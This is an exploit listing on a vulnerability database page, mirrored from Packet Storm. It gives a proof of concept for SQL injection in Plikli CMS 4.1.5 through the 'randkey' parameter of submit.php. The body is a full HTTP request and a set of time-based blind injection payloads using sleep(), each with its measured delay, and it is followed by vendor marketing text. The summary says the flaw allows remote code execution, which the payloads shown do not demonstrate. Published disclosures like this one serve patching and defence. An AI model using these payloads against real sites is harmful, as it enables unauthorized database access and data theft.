Lucene search
K

Plikli CMS 4.1.5 SQL Injection

🗓️ 06 Mar 2025 00:00:00Reported by Ahmet Ümit BayramType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 293 Views

Plikli CMS 4.1.5 is vulnerable to SQL injection via 'randkey', allowing remote code execution.

Code
# Exploit Title: Plikli CMS 4.1.5 - 'randkey' SQL Injection
    # Discovered by: Ahmet Ümit BAYRAM
    # Discovered Date: 05.03.2024
    # Vendor Homepage: https://github.com/kkumar326/plikli
    # Software Link:
    https://github.com/kkumar326/plikli/archive/refs/heads/master.zip
    # Demo: https://softaculous.com/demos/plikli_cms
    # Tested Version: v4.1.5 (latest)
    # Tested on: MacOS
    
    ### PoC Request ###
    
    POST /pliklicms/submit.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/
    20100101 Firefox/124.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/
    avif,image/webp,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 95
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/pliklicms/submit.php
    Cookie: PHPSESSID=7f592f5d5ac82747bb6e682ca456a007; mnm_user=admin; mnm_key=
    YWRtaW46MjJrTkdHVDVLbG9NWToxZjMxOGY0YTk5OTQwMzkyYjZhOTJlNjI4MWUyZmRiZg%3D%3D;
    mnm_data=11fe3441ad4723841afd0beace6794ff
    Upgrade-Insecure-Requests: 1
    
    url=http%3A%2F%2Fgoogle.com&phase=1&randkey=1426389526396&id=c_1
    
    ### Vulnerable Parameter ###
    
    randkey
    
    ### Payloads ###
    
    1426389526396*if(now()=sysdate(),sleep(15),0) => 15.581
    1426389526396*if(now()=sysdate(),sleep(6),0) => 6.527
    1426389526396*if(now()=sysdate(),sleep(0),0) => 0.496
    1426389526396*if(now()=sysdate(),sleep(15),0) => 15.488
    1426389526396*if(now()=sysdate(),sleep(3),0) => 5.152
    1426389526396*if(now()=sysdate(),sleep(0),0) => 0.661
    1426389526396*if(now()=sysdate(),sleep(6),0) => 6.851

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Mar 2025 00:00Current
8.5High risk
Vulners AI Score8.5
293